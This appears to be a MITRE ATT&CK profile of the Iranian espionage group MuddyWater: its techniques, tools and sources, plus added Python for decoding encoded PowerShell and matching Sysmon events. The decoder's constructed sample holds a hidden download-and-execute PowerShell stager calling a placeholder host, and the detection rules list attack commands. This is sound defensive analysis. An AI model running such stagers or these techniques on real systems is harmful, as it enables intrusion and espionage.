Group description: MuddyWater
MuddyWater, Earth Vetala, MERCURY, Static Kitten, Seedworm, TEMP.Zagros, Mango Sandstorm, TA450, Group G0069 | MITRE ATT&CK®
MuddyWater is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS). [1] Since at least 2017, MuddyWater has targeted a range of government and private organizations across sectors, including telecommunications, local government, defense, and oil and natural gas organizations, in the Middle East, Asia, Africa, Europe, and North America. [2] [3] [4] [5] [6] [7] [8]
ID: G0069
Associated Groups: Earth Vetala, MERCURY, Static Kitten, Seedworm, TEMP.Zagros, Mango Sandstorm, TA450
Contributors: Ozer Sarilar, @ozersarilar, STM; Daniyal Naeem, BT Security; Marco Pedrinazzi, @pedrinazziM
Version: 6.0
Created: 18 April 2018
Last Modified: 22 October 2025
Associated Group Descriptions
Name | Description
Earth Vetala | [9]
MERCURY | [10]
Static Kitten | [10] [9]
Seedworm | [3] [10] [9]
TEMP.Zagros | [11] [10] [9]
Mango Sandstorm | [12]
TA450 | [13]
Techniques Used
Domain | ID | Name | Use
Enterprise | T1548.002 | Abuse Elevation Control Mechanism: Bypass User Account Control | MuddyWater uses various techniques to bypass UAC. [4]
Enterprise | T1087.002 | Account Discovery: Domain Account | MuddyWater has run net user /domain from cmd.exe to enumerate domain users. [9]
Enterprise | T1583.006 | Acquire Infrastructure: Web Services | MuddyWater has used file sharing services including OneHub, Sync, and TeraBox to distribute tools. [10] [9] [13]
Enterprise | T1071.001 | Application Layer Protocol: Web Protocols | MuddyWater has used HTTP for C2 communications. [5] [9]
Enterprise | T1560.001 | Archive Collected Data: Archive via Utility | MuddyWater has used the native Windows cabinet creation tool, makecab.exe, likely to compress stolen data to be uploaded. [3]
Enterprise | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | MuddyWater has added the Registry Run key value HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemTextEncoding to establish persistence. [11] [14] [15] [6] [9] [8]
Enterprise | T1059.001 | Command and Scripting Interpreter: PowerShell | MuddyWater has used PowerShell for execution. [11] [16] [14] [3] [4] [15] [6] [9] [7] [8]
Enterprise | T1059.003 | Command and Scripting Interpreter: Windows Command Shell | MuddyWater has used a custom tool for creating reverse shells. [3]
Enterprise | T1059.005 | Command and Scripting Interpreter: Visual Basic | MuddyWater has used VBScript files to execute its POWERSTATS payload, as well as macros. [11] [16] [14] [3] [4] [5] [6] [9] [8]
Enterprise | T1059.006 | Command and Scripting Interpreter: Python | MuddyWater has developed tools in Python, including Out1. [9]
Enterprise | T1059.007 | Command and Scripting Interpreter: JavaScript | MuddyWater has used JavaScript files to execute its POWERSTATS payload. [4] [11] [7]
Enterprise | T1555 | Credentials from Password Stores | MuddyWater has performed credential dumping with LaZagne and other tools, including by dumping passwords saved in victim email. [2] [3] [9]
Enterprise | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | MuddyWater has run tools including Browser64 to steal passwords saved in victim web browsers. [3] [9]
Enterprise | T1132.001 | Data Encoding: Standard Encoding | MuddyWater has used tools to encode C2 communications, including Base64 encoding. [5] [9]
Enterprise | T1074.001 | Data Staged: Local Data Staging | MuddyWater has stored a decoy PDF file within a victim's %temp% folder. [8]
Enterprise | T1140 | Deobfuscate/Decode Files or Information | MuddyWater has decoded base64-encoded PowerShell, JavaScript, and VBScript. [11] [16] [4] [8]
Enterprise | T1573.001 | Encrypted Channel: Symmetric Cryptography | MuddyWater has used AES to encrypt C2 responses. [8]
Enterprise | T1041 | Exfiltration Over C2 Channel | MuddyWater has used C2 infrastructure to receive exfiltrated data. [6]
Enterprise | T1190 | Exploit Public-Facing Application | MuddyWater has exploited the Microsoft Exchange Control Panel remote code execution vulnerability CVE-2020-0688 (a static ASP.NET validation key shared by all Exchange installations, which lets an authenticated user forge a ViewState that deserializes to arbitrary code on the server). [7]
Enterprise | T1203 | Exploitation for Client Execution | MuddyWater has exploited the Microsoft Office vulnerability CVE-2017-0199 (the OLE2Link HTA handler flaw) for execution. [5]
Enterprise | T1210 | Exploitation of Remote Services | MuddyWater has exploited the Microsoft Netlogon elevation of privilege vulnerability CVE-2020-1472 (Zerologon). [7]
Enterprise | T1083 | File and Directory Discovery | MuddyWater has used malware that checked whether the ProgramData folder contained folders or files with the keywords "Kasper," "Panda," or "ESET." [14]
Enterprise | T1574.001 | Hijack Execution Flow: DLL | MuddyWater maintains persistence on victim networks by side-loading DLLs to trick legitimate programs into running malware. [7]
Enterprise | T1562.001 | Impair Defenses: Disable or Modify Tools | MuddyWater can disable the system's local proxy settings. [9]
Enterprise | T1105 | Ingress Tool Transfer | MuddyWater has used malware that can upload additional files to the victim's machine. [14] [4] [6] [9]
Enterprise | T1559.001 | Inter-Process Communication: Component Object Model | MuddyWater has used malware that has the capability to execute malicious code via COM, DCOM, and Outlook. [14] [5] [7]
Enterprise | T1559.002 | Inter-Process Communication: Dynamic Data Exchange | MuddyWater has used malware that can execute PowerShell scripts via DDE. [14]
Enterprise | T1036.005 | Masquerading: Match Legitimate Resource Name or Location | MuddyWater has disguised malicious executables and used filenames and Registry key names associated with Windows Defender. [11] [15] [10]
Enterprise | T1104 | Multi-Stage Channels | MuddyWater has used one C2 to obtain enumeration scripts and monitor web logs, but a different C2 to send data back. [15]
Enterprise | T1027.003 | Obfuscated Files or Information: Steganography | MuddyWater has stored obfuscated JavaScript code in an image file named temp.jpg. [4]
Enterprise | T1027.004 | Obfuscated Files or Information: Compile After Delivery | MuddyWater has used the .NET csc.exe tool to compile executables from downloaded C# code. [4]
Enterprise | T1027.010 | Obfuscated Files or Information: Command Obfuscation | MuddyWater has used Daniel Bohannon's Invoke-Obfuscation framework and obfuscated PowerShell scripts. [2] [17] The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands. [2] [11] [14] [15] [5] [9] [8]
Enterprise | T1588.002 | Obtain Capabilities: Tool | MuddyWater has used the legitimate tools ConnectWise, RemoteUtilities, and SimpleHelp to gain access to the target environment. [10] [18]
Enterprise | T1137.001 | Office Application Startup: Office Template Macros | MuddyWater has used a Word Template, Normal.dotm, for persistence. [6]
Enterprise | T1003.001 | OS Credential Dumping: LSASS Memory | MuddyWater has performed credential dumping with Mimikatz and procdump64.exe. [2] [3] [9]
Enterprise | T1003.004 | OS Credential Dumping: LSA Secrets | MuddyWater has performed credential dumping with LaZagne. [2] [3]
Enterprise | T1003.005 | OS Credential Dumping: Cached Domain Credentials | MuddyWater has performed credential dumping with LaZagne. [2] [3]
Enterprise | T1566.001 | Phishing: Spearphishing Attachment | MuddyWater has compromised third parties and used compromised accounts to send spearphishing emails with targeted attachments to recipients. [2] [11] [14] [5] [10] [9] [7] [13]
Enterprise | T1566.002 | Phishing: Spearphishing Link | MuddyWater has sent targeted spearphishing e-mails with malicious links. [10] [9] [13]
Enterprise | T1057 | Process Discovery | MuddyWater has used malware to obtain a list of running processes on the system. [14] [5]
Enterprise | T1090.002 | Proxy: External Proxy | MuddyWater has controlled POWERSTATS from behind a proxy network to obfuscate the C2 location. [3] MuddyWater has used a series of compromised websites that victims connected to randomly to relay information to command and control (C2). [6] [9]
Enterprise | T1219 | Remote Access Tools | MuddyWater has used the legitimate applications ScreenConnect, AteraAgent and SimpleHelp to manage systems remotely and move laterally. [9] [10] [13] [18]
Enterprise | T1053.005 | Scheduled Task/Job: Scheduled Task | MuddyWater has used scheduled tasks to establish persistence. [6]
Enterprise | T1113 | Screen Capture | MuddyWater has used malware that can capture screenshots of the victim's machine. [14]
Enterprise | T1518 | Software Discovery | MuddyWater has used a PowerShell backdoor to check for Skype connectivity on the target machine. [9]
Enterprise | T1518.001 | Software Discovery: Security Software Discovery | MuddyWater has used malware to check running processes against a hard-coded list of security tools often used by malware researchers. [14]
Enterprise | T1218.003 | System Binary Proxy Execution: CMSTP | MuddyWater has used CMSTP.exe and a malicious INF to execute its POWERSTATS payload. [11]
Enterprise | T1218.005 | System Binary Proxy Execution: Mshta | MuddyWater has used mshta.exe to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution. [11] [14]
Enterprise | T1218.011 | System Binary Proxy Execution: Rundll32 | MuddyWater has used malware that leveraged rundll32.exe in a Registry Run key to execute a .dll. [14]
Enterprise | T1082 | System Information Discovery | MuddyWater has used malware that can collect the victim's OS version and machine name. [14] [15] [6] [9] [8]
Enterprise | T1016 | System Network Configuration Discovery | MuddyWater has used malware to collect the victim's IP address and domain name. [14]
Enterprise | T1049 | System Network Connections Discovery | MuddyWater has used a PowerShell backdoor to check for Skype connections on the target machine. [9]
Enterprise | T1033 | System Owner/User Discovery | MuddyWater has used malware that can collect the victim's username. [14] [9]
Enterprise | T1552.001 | Unsecured Credentials: Credentials In Files | MuddyWater has run a tool that steals passwords saved in victim email. [3]
Enterprise | T1204.001 | User Execution: Malicious Link | MuddyWater has distributed URLs in phishing e-mails that link to lure documents. [10] [9] [13]
Enterprise | T1204.002 | User Execution: Malicious File | MuddyWater has attempted to get users to open malicious PDF attachments and to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails. [2] [11] [14] [15] [5] [6] [10] [9] [7] [8] [13]
Enterprise | T1102.002 | Web Service: Bidirectional Communication | MuddyWater has used web services including OneHub to distribute remote access tools. [10]
Enterprise | T1047 | Windows Management Instrumentation | MuddyWater has used malware that leveraged WMI for execution and for querying host information. [14] [4] [15] [7]
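The decoding rows in the table above (T1140, T1027.010 and T1132.001 all describe base64-wrapped PowerShell, VBScript and JavaScript stages, and T1218.005 describes mshta.exe handing a PowerShell one-liner to the interpreter) are easier to act on with a decoder at hand. The Python below is an added example written for this page, not code from MITRE or from any MuddyWater sample: it unwraps a PowerShell -EncodedCommand argument (UTF-16LE text under base64), then peels nested [Convert]::FromBase64String(...) literals until no further layer is found, and pulls URLs out of the final stage. The sample command line, the placeholder host c2.example.invalid and the script text are constructed for the example and are not indicators from the cited reports.

```python
"""Peel the base64 layers that wrap MuddyWater-style PowerShell stages.

Added example for this page, not code from MITRE ATT&CK or from any sample.
The encoded command built at the bottom is CONSTRUCTED; the URL inside it is
a placeholder, not a real indicator.
"""
from __future__ import annotations

import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand; this covers
# the forms most often seen in the wild (-e, -en, -enc, -encodedcommand).
ENC_ARG = re.compile(r"-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# base64 literal handed to [Convert]::FromBase64String("...") or ('...')
NESTED_B64 = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)
URL = re.compile(r"https?://[^\s'\"()]+", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """-EncodedCommand payloads are UTF-16LE before base64; decode accordingly."""
    m = ENC_ARG.search(cmdline)
    if not m:
        raise ValueError("no -EncodedCommand argument found")
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def peel(script: str, max_depth: int = 8) -> list[str]:
    """Return [layer0, layer1, ...] down to the innermost decodable plaintext."""
    layers = [script]
    for _ in range(max_depth):
        m = NESTED_B64.search(layers[-1])
        if not m:
            break
        raw = base64.b64decode(m.group(1))
        # Inner stages are either UTF-16LE (PowerShell's default, full of NULs)
        # or plain UTF-8/ASCII; anything that decodes as neither ends the chain.
        try:
            text = raw.decode("utf-16-le") if b"\x00" in raw else raw.decode("utf-8")
        except UnicodeDecodeError:
            break
        layers.append(text)
    return layers


def analyze(cmdline: str) -> dict:
    """Decode every layer and report the depth, final script and any URLs."""
    layers = peel(decode_encoded_command(cmdline))
    final = layers[-1]
    return {"depth": len(layers), "final": final, "urls": URL.findall(final)}


# ---- constructed sample: inner stage -> base64 -> outer stager -> -enc ----
INNER = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/s')"
inner_b64 = base64.b64encode(INNER.encode("utf-16-le")).decode()
OUTER = ("$s=[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('"
         + inner_b64 + "'));IEX $s")
SAMPLE_CMDLINE = ("powershell.exe -NoP -W Hidden -enc "
                  + base64.b64encode(OUTER.encode("utf-16-le")).decode())

if __name__ == "__main__":
    result = analyze(SAMPLE_CMDLINE)
    print(f"layers decoded: {result['depth']}")
    print(result["final"])
    print("urls:", result["urls"])
```

Running the file prints two decoded layers and the placeholder URL; on a real command line from a process-creation event the same analyze() call gives the final stage and its download locations without executing anything. The UTF-16LE heuristic (a NUL byte in the decoded bytes) is an assumption that holds for ASCII script text; a stage that is itself binary would stop the chain at that layer rather than mis-decode it.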
Software
ID | Name | References | Techniques
S0591 | ConnectWise | [10] [9] | Command and Scripting Interpreter: PowerShell, Screen Capture, Video Capture
S0488 | CrackMapExec | [19] [3] | Account Discovery: Domain Account, Brute Force: Password Spraying, Brute Force: Password Guessing, Brute Force, Command and Scripting Interpreter: PowerShell, File and Directory Discovery, Local Storage Discovery, Modify Registry, Network Share Discovery, OS Credential Dumping: Security Account Manager, OS Credential Dumping: NTDS, OS Credential Dumping: LSA Secrets, Password Policy Discovery, Permission Groups Discovery: Domain Groups, Remote System Discovery, Scheduled Task/Job: At, System Network Configuration Discovery, System Network Connections Discovery, Use Alternate Authentication Material: Pass the Hash, Windows Management Instrumentation
S1243 | DCHSpy | [20] | Application Layer Protocol, Archive Collected Data, Audio Capture, Data from Local System, Location Tracking, Masquerading: Match Legitimate Name or Location, Protected User Data: Contact List, Protected User Data: SMS Messages, Protected User Data: Accounts, Protected User Data: Call Log, Stored Application Data, Video Capture
S0363 | Empire | [19] | Abuse Elevation Control Mechanism: Bypass User Account Control, Access Token Manipulation: SID-History Injection, Access Token Manipulation, Access Token Manipulation: Create Process with Token, Account Discovery: Domain Account, Account Discovery: Local Account, Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay, Application Layer Protocol: Web Protocols, Archive Collected Data, Automated Collection, Automated Exfiltration, Boot or Logon Autostart Execution: Security Support Provider, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Boot or Logon Autostart Execution: Shortcut Modification, Browser Information Discovery, Clipboard Data, Command and Scripting Interpreter: PowerShell, Command and Scripting Interpreter: Windows Command Shell, Command and Scripting Interpreter, Create Account: Local Account, Create Account: Domain Account, Create or Modify System Process: Windows Service, Credentials from Password Stores: Keychain, Credentials from Password Stores: Credentials from Web Browsers, Domain or Tenant Policy Modification: Group Policy Modification, Domain Trust Discovery, Email Collection: Local Email Collection, Encrypted Channel: Asymmetric Cryptography, Event Triggered Execution: Accessibility Features, Exfiltration Over C2 Channel, Exfiltration Over Web Service: Exfiltration to Code Repository, Exfiltration Over Web Service: Exfiltration to Cloud Storage, Exploitation for Privilege Escalation, Exploitation of Remote Services, File and Directory Discovery, Group Policy Discovery, Hijack Execution Flow: Path Interception by Unquoted Path, Hijack Execution Flow: Path Interception by Search Order Hijacking, Hijack Execution Flow: Path Interception by PATH Environment Variable, Hijack Execution Flow: Dylib Hijacking, Hijack Execution Flow: DLL, Indicator Removal: Timestomp, Ingress Tool Transfer, Input Capture: Keylogging, Input Capture: Credential API Hooking, Native API, Network Service Discovery, Network Share Discovery, Network Sniffing, Obfuscated Files or Information: Command Obfuscation, OS Credential Dumping: LSASS Memory, Process Discovery, Process Injection, Remote Services: Distributed Component Object Model, Remote Services: SSH, Scheduled Task/Job: Scheduled Task, Screen Capture, Software Discovery: Security Software Discovery, Steal or Forge Kerberos Tickets: Kerberoasting, Steal or Forge Kerberos Tickets: Golden Ticket, Steal or Forge Kerberos Tickets: Silver Ticket, System Information Discovery, System Network Configuration Discovery, System Network Connections Discovery, System Owner/User Discovery, System Services: Service Execution, Trusted Developer Utilities Proxy Execution: MSBuild, Unsecured Credentials: Credentials In Files, Unsecured Credentials: Private Keys, Use Alternate Authentication Material: Pass the Hash, Video Capture, Web Service: Bidirectional Communication, Windows Management Instrumentation
S0250 | Koadic | [6] [19] | Abuse Elevation Control Mechanism: Bypass User Account Control, Application Layer Protocol: Web Protocols, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Clipboard Data, Command and Scripting Interpreter: Visual Basic, Command and Scripting Interpreter: PowerShell, Command and Scripting Interpreter: Windows Command Shell, Data from Local System, Encrypted Channel: Asymmetric Cryptography, File and Directory Discovery, Hide Artifacts: Hidden Window, Ingress Tool Transfer, Network Service Discovery, Network Share Discovery, OS Credential Dumping: Security Account Manager, OS Credential Dumping: NTDS, Process Injection: Dynamic-link Library Injection, Remote Services: Remote Desktop Protocol, Scheduled Task/Job: Scheduled Task, System Binary Proxy Execution: Mshta, System Binary Proxy Execution: Regsvr32, System Binary Proxy Execution: Rundll32, System Information Discovery, System Network Configuration Discovery, System Owner/User Discovery, System Services: Service Execution, Windows Management Instrumentation
S0349 | LaZagne | [3] [19] | Credentials from Password Stores: Windows Credential Manager, Credentials from Password Stores: Credentials from Web Browsers, Credentials from Password Stores, Credentials from Password Stores: Keychain, OS Credential Dumping: LSA Secrets, OS Credential Dumping: /etc/passwd and /etc/shadow, OS Credential Dumping: LSASS Memory, OS Credential Dumping: Cached Domain Credentials, OS Credential Dumping: Proc Filesystem, Unsecured Credentials: Credentials In Files
S0002 | Mimikatz | [2] [19] | Access Token Manipulation: SID-History Injection, Account Manipulation, Boot or Logon Autostart Execution: Security Support Provider, Credentials from Password Stores, Credentials from Password Stores: Credentials from Web Browsers, Credentials from Password Stores: Windows Credential Manager, OS Credential Dumping: DCSync, OS Credential Dumping: Security Account Manager, OS Credential Dumping: LSASS Memory, OS Credential Dumping: LSA Secrets, Rogue Domain Controller, Steal or Forge Authentication Certificates, Steal or Forge Kerberos Tickets: Golden Ticket, Steal or Forge Kerberos Tickets: Silver Ticket, Unsecured Credentials: Private Keys, Use Alternate Authentication Material: Pass the Hash, Use Alternate Authentication Material: Pass the Ticket
S1047 | Mori | [7] | Application Layer Protocol: Web Protocols, Application Layer Protocol: DNS, Data Encoding: Standard Encoding, Data Obfuscation: Junk Data, Deobfuscate/Decode Files or Information, Indicator Removal: File Deletion, Modify Registry, Query Registry, System Binary Proxy Execution: Regsvr32
S0594 | Out1 | [9] | Application Layer Protocol: Web Protocols, Command and Scripting Interpreter: Windows Command Shell, Data from Local System, Email Collection: Local Email Collection, Obfuscated Files or Information
S0194 | PowerSploit | [19] | Access Token Manipulation, Account Discovery: Local Account, Audio Capture, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Boot or Logon Autostart Execution: Security Support Provider, Command and Scripting Interpreter: PowerShell, Create or Modify System Process: Windows Service, Credentials from Password Stores: Windows Credential Manager, Data from Local System, Domain Trust Discovery, Hijack Execution Flow: Path Interception by PATH Environment Variable, Hijack Execution Flow: Path Interception by Unquoted Path, Hijack Execution Flow: DLL, Hijack Execution Flow: Path Interception by Search Order Hijacking, Input Capture: Keylogging, Obfuscated Files or Information: Indicator Removal from Tools, Obfuscated Files or Information: Command Obfuscation, OS Credential Dumping: LSASS Memory, Process Discovery, Process Injection: Dynamic-link Library Injection, Query Registry, Reflective Code Loading, Scheduled Task/Job: Scheduled Task, Screen Capture, Steal or Forge Kerberos Tickets: Kerberoasting, Unsecured Credentials: Credentials in Registry, Unsecured Credentials: Group Policy Preferences, Windows Management Instrumentation
S0223 | POWERSTATS | [2] [11] [4] [3] [5] | Account Discovery: Local Account, Command and Scripting Interpreter: PowerShell, Command and Scripting Interpreter: Visual Basic, Command and Scripting Interpreter: JavaScript, Data Encoding: Standard Encoding, Data from Local System, Deobfuscate/Decode Files or Information, Encrypted Channel: Asymmetric Cryptography, Impair Defenses: Disable or Modify Tools, Indicator Removal: File Deletion, Ingress Tool Transfer, Inter-Process Communication: Component Object Model, Inter-Process Communication: Dynamic Data Exchange, Masquerading: Masquerade Task or Service, Obfuscated Files or Information: Command Obfuscation, Obfuscated Files or Information: Junk Code Insertion, Process Discovery, Proxy: External Proxy, Scheduled Task/Job: Scheduled Task, Scheduled Transfer, Screen Capture, Software Discovery: Security Software Discovery, System Binary Proxy Execution: Mshta, System Information Discovery, System Network Configuration Discovery, System Owner/User Discovery, Windows Management Instrumentation
S1046 | PowGoop | [7] | Application Layer Protocol: Web Protocols, Command and Scripting Interpreter: PowerShell, Data Encoding: Non-Standard Encoding, Deobfuscate/Decode Files or Information, Encrypted Channel, Hijack Execution Flow: DLL, Masquerading, Masquerading: Match Legitimate Resource Name or Location
S0592 | RemoteUtilities | [9] | File and Directory Discovery, Ingress Tool Transfer, Screen Capture, System Binary Proxy Execution: Msiexec
S0450 | SHARPSTATS | [19] | Command and Scripting Interpreter: PowerShell, Ingress Tool Transfer, Obfuscated Files or Information: Command Obfuscation, System Information Discovery, System Network Configuration Discovery, System Owner/User Discovery, System Time Discovery
S1035 | Small Sieve | [7] [21] | Application Layer Protocol: Web Protocols, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: Windows Command Shell, Command and Scripting Interpreter: Python, Data Encoding: Non-Standard Encoding, Encrypted Channel: Asymmetric Cryptography, Execution Guardrails, Ingress Tool Transfer, Masquerading: Match Legitimate Resource Name or Location, Obfuscated Files or Information, System Network Configuration Discovery, System Owner/User Discovery, Web Service: Bidirectional Communication
S1037 | STARWHALE | [7] | Application Layer Protocol: Web Protocols, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: Visual Basic, Command and Scripting Interpreter: Windows Command Shell, Create or Modify System Process: Windows Service, Data Encoding: Standard Encoding, Data from Local System, Data Staged: Local Data Staging, Exfiltration Over C2 Channel, Obfuscated Files or Information: Encrypted/Encoded File, System Information Discovery, System Network Configuration Discovery, System Owner/User Discovery, User Execution: Malicious File
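The Techniques Used table above documents several living-off-the-land steps that leave distinctive endpoint telemetry: net user /domain (T1087.002), makecab.exe on collected data (T1560.001), cmstp.exe with a malicious INF (T1218.003), mshta.exe passing a PowerShell one-liner (T1218.005), csc.exe compiling downloaded C# (T1027.004), base64-encoded PowerShell commands (T1027.010), WMI execution (T1047), and a rundll32.exe command stored under the HKCU Run key (T1547.001, T1218.011). The Python below is an added example for this page, not tooling from MITRE or from any cited report: it encodes those rows as field-regex rules over Sysmon-shaped process-creation (Event ID 1) and registry-value-set (Event ID 13) events and returns the ATT&CK IDs each event hits. The events, paths, SID and values are constructed; the tightening choices (for example, only flagging makecab.exe and csc.exe when the parent is a script host) are my assumptions to cut noise, not anything the page states.

```python
"""Map Sysmon-style endpoint events to the MuddyWater TTPs listed on this page.

Added example, not MITRE tooling and not derived from any cited report.
Field names follow Sysmon Event ID 1 (process creation) and Event ID 13
(registry value set); every event below is CONSTRUCTED for illustration.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class Rule:
    technique: str                  # ATT&CK ID as written in the table above
    event_id: int                   # Sysmon event type the rule applies to
    checks: dict[str, re.Pattern]   # every listed field must match its regex


def rx(pattern: str) -> re.Pattern:
    return re.compile(pattern, re.I)


# Assumption: a script host as parent separates attacker use of these LOLBins
# from build systems and installers that also call them.
SCRIPT_HOSTS = r"\\(powershell|pwsh|wscript|cscript|mshta)\.exe$"

RULES = [
    Rule("T1087.002", 1, {"Image": rx(r"\\net1?\.exe$"),
                          "CommandLine": rx(r"\buser\b.*\s/domain\b")}),
    Rule("T1560.001", 1, {"Image": rx(r"\\makecab\.exe$"),
                          "ParentImage": rx(SCRIPT_HOSTS)}),
    Rule("T1218.003", 1, {"Image": rx(r"\\cmstp\.exe$"),
                          "CommandLine": rx(r"\.inf\b")}),
    Rule("T1218.005", 1, {"Image": rx(r"\\mshta\.exe$"),
                          "CommandLine": rx(r"powershell|javascript:|vbscript:")}),
    Rule("T1027.004", 1, {"Image": rx(r"\\csc\.exe$"),
                          "ParentImage": rx(SCRIPT_HOSTS)}),
    Rule("T1027.010", 1, {"Image": rx(r"\\powershell\.exe$"),
                          "CommandLine": rx(r"\s-(e|en|enc|encodedcommand)\s")}),
    Rule("T1047", 1, {"Image": rx(r"\\wmic\.exe$"),
                      "CommandLine": rx(r"process\s+call\s+create")}),
    Rule("T1547.001", 13, {"TargetObject": rx(r"\\CurrentVersion\\Run\\")}),
    # rundll32 launched from a Run key value, as described for [14]
    Rule("T1218.011", 13, {"TargetObject": rx(r"\\CurrentVersion\\Run\\"),
                           "Details": rx(r"rundll32(\.exe)?\b")}),
]


def match(event: dict) -> list[str]:
    """Return every technique ID whose rule fully matches this event."""
    hits = []
    for rule in RULES:
        if event.get("EventID") != rule.event_id:
            continue
        if all(p.search(event.get(f, "")) for f, p in rule.checks.items()):
            hits.append(rule.technique)
    return hits


def hunt(events: list[dict]) -> list[tuple[int, list[str]]]:
    """(index, technique IDs) for each event that hits at least one rule."""
    return [(i, m) for i, e in enumerate(events) if (m := match(e))]


# Constructed sample telemetry; nothing here is a real indicator.
EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": 'mshta.exe "vbscript:CreateObject(""WScript.Shell"").Run '
                    '""powershell -w hidden -enc SQBFAFgA"",0"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -enc SQBFAFgA"},
    {"EventID": 1, "Image": r"C:\Windows\System32\net.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "net user /domain"},
    {"EventID": 1, "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"csc.exe /noconfig /out:C:\Users\Public\a.exe C:\Users\Public\a.cs"},
    {"EventID": 1, "Image": r"C:\Windows\System32\makecab.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"makecab.exe C:\Users\Public\docs.txt C:\Users\Public\docs.cab"},
    {"EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\SystemTextEncoding",
     "Details": r"rundll32.exe C:\Users\Public\st.dll,Start"},
    {"EventID": 1, "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for idx, ids in hunt(EVENTS):
        print(idx, ", ".join(ids))
```

Six of the seven constructed events hit a rule and the svchost.exe event does not; the Run key event hits both T1547.001 and T1218.011 because the value name and the rundll32 command are two separate signals on one registry write. In production the same rules would be fed from a Sysmon or EDR export rather than an inline list, and the script-host parent constraint is the first thing to revisit if a build server starts producing csc.exe alerts.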
References
[1] Cyber National Mission Force. (2022, January 12). Iranian intel cyber suite of malware uses open source tools. Retrieved September 30, 2022.
[2] Lancaster, T. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018.
[3] Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.
[4] ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.
[5] ClearSky. (2019, June). Iranian APT group 'MuddyWater' Adds Exploits to Their Arsenal. Retrieved May 14, 2020.
[6] Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020.
[7] FBI, CISA, CNMF, NCSC-UK. (2022, February 24). Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks. Retrieved September 27, 2022.
[8] Malhotra, A. and Ventura, V. (2022, January 31). Iranian APT MuddyWater targets Turkish users via malicious PDFs, executables. Retrieved June 22, 2022.
[9] Peretz, A. and Theck, E. (2021, March 5). Earth Vetala - MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021.
[10] Mele, G. et al. (2021, February 10). Probable Iranian Cyber Actors, Static Kitten, Conducting Cyberespionage Campaign Targeting UAE and Kuwait Government Agencies. Retrieved March 17, 2021.
[11] Singh, S. et al. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.
[12] Microsoft. (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
[13] Miller, J. et al. (2024, March 21). Security Brief: TA450 Uses Embedded Links in PDF Attachments in Latest Campaign. Retrieved March 27, 2024.
[14] Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.
[15] Adamitis, D. et al. (2019, May 20). Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques. Retrieved June 5, 2019.
[16] Villanueva, M., Co, M. (2018, June 14). Another Potential MuddyWater Campaign uses Powershell-based PRB-Backdoor. Retrieved July 3, 2018.
[17] Bohannon, D. (2017, March 13). Invoke-Obfuscation - PowerShell Obfuscator. Retrieved June 18, 2017.
[18] Rostovcev, N. (2023, April 18). SimpleHarm: Tracking MuddyWater's infrastructure. Retrieved July 11, 2024.
[19] Lunghi, D. and Horejsi, J. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020.
[20] Albrecht, J., Islamoglu, A. (2025, July 21). Lookout Discovers Iranian APT MuddyWater Leveraging DCHSpy During Israel-Iran Conflict. Retrieved September 19, 2025.
[21] NCSC GCHQ. (2022, January 27). Small Sieve Malware Analysis Report. Retrieved August 22, 2022.